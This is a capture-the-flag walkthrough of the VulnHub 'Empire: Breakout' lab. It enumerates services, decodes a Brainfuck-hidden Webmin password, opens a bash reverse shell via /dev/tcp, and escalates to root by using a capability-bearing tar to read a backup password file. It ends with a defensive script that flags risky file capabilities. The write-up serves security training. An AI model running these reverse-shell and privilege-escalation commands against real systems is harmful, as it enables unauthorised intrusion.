VulnHub: Empire: Breakout

Today we will take a look at VulnHub: Breakout. My goal in sharing this writeup is to show you the way if you get stuck. Please try to understand each step and take notes.

  • Network scan
nmap -p- -sV -sC --open 192.168.0.109

PORT      STATE SERVICE     VERSION
80/tcp open http Apache httpd 2.4.51 ((Debian))
|_http-server-header: Apache/2.4.51 (Debian)
|_http-title: Apache2 Debian Default Page: It works
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
10000/tcp open http MiniServ 1.981 (Webmin httpd)
|_http-server-header: MiniServ/1.981
|_http-title: 200 — Document follows
20000/tcp open http MiniServ 1.830 (Webmin httpd)
|_http-server-header: MiniServ/1.830
|_http-title: 200 — Document follows
  • Enum4linux

Command: enum4linux -a 192.168.0.109

We find a username in the output.

  • Web

If we look at the bottom of the page's source code, we see a comment containing text written in Brainfuck, an esoteric programming language. This is obfuscation, not encryption.

view-source:http://192.168.0.109/

<!--
don't worry no one will get here, it's safe to share with you my access. Its encrypted :)

++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.

-->

If we run the Brainfuck program, it prints the password.

.2uqPEfj3D<P'a-3
  • Reverse Shell

When we browse to port 20000, it redirects us to the admin panel at this link:

https://192.168.0.109:20000/

Username: cyber
Password: .2uqPEfj3D<P'a-3

Once logged in, there is a terminal icon on the bottom left. With it we can run commands. I'll use it to get a reverse shell.

bash -i >& /dev/tcp/YourIP/1234 0>&1
  • Root

Command: getcap -r / 2>/dev/null

/home/cyber/tar cap_dac_read_search=ep
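
The tar binary in cyber's home directory carries cap_dac_read_search, which bypasses file read permission checks, so we can use it to archive /var/backups/.old_pass.bak and then extract a copy we are able to read:

cyber@breakout:~$ ./tar -cvf old_pass /var/backups/.old_pass.bak
cyber@breakout:~$ ./tar -xvf old_pass
cyber@breakout:~$ cat var/backups/.old_pass.bak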
Ts&4&YurgtRX(=~h
cyber@breakout:~$ su root

And now we are root.
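
From the defender's side, the weakness used in the Root step is a file capability on a tar binary in a user's home directory. The following added example (not part of the original writeup) parses `getcap -r` output and flags such entries; the set of risky capabilities, the `allowlist` parameter and every sample line except the first are assumptions of this example.

```python
import re

# Capabilities that bypass file permissions or lead directly to root.
# This selection is the example's own assumption; adjust it to your environment.
RISKY = {"cap_dac_read_search", "cap_dac_override", "cap_setuid", "cap_setgid",
         "cap_sys_admin", "cap_sys_ptrace", "cap_chown", "cap_fowner"}

# One clause of capability text: "cap_a,cap_b=ep", "cap_a+ep" or "=ep" (every capability).
NAME = r"(?:cap_[a-z0-9_]+|all)"
CLAUSE = re.compile(rf"^(?P<names>(?:{NAME}(?:,{NAME})*)?)(?P<ops>(?:[=+-][eip]*)+)$")

def parse_getcap_line(line):
    """Split one getcap line into (path, [(capability, flags), ...]), old or new layout."""
    tokens = line.strip().split(" ")
    grants = []
    # Capability clauses sit at the end of the line; peel them off from the right.
    while len(tokens) > 1 and tokens[-1] != "=" and (m := CLAUSE.match(tokens[-1])):
        tokens.pop()
        # Letters after "=" or "+" are granted; "-" removes flags, so it is ignored.
        flags = "".join(sorted(set("".join(re.findall(r"[=+]([eip]*)", m["ops"])))))
        grants += [(name, flags) for name in (m["names"] or "all").split(",")]
    if len(tokens) > 1 and tokens[-1] == "=":  # separator printed by older libcap
        tokens.pop()
    return " ".join(tokens), grants

def risky_files(getcap_output, allowlist=()):
    """Return (path, capability) pairs with a risky capability in the e or p set."""
    findings = []
    for line in filter(str.strip, getcap_output.splitlines()):
        path, grants = parse_getcap_line(line)
        for name, flags in grants:
            active = set(flags) & {"e", "p"}  # inheritable-only entries are skipped
            if active and path not in allowlist and (name == "all" or name in RISKY):
                findings.append((path, name))
    return findings

# Constructed sample input; only the first line appears in the writeup.
SAMPLE = """\
/home/cyber/tar cap_dac_read_search=ep
/usr/bin/ping cap_net_raw=ep
/usr/bin/oldtool = cap_setuid,cap_net_bind_service+ep
/opt/helper cap_sys_admin=i
"""

if __name__ == "__main__":
    for path, cap in risky_files(SAMPLE):
        print(f"{path}: {cap}")
```

Feed it the real output of `getcap -r / 2>/dev/null` and remove any unexpected capability it reports with `setcap -r <path>`.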

“If you have any questions or comments, please do not hesitate to write. Have a good day.”


Hello, my name is Elman. I am from Azerbaijan. I wish you a good day.
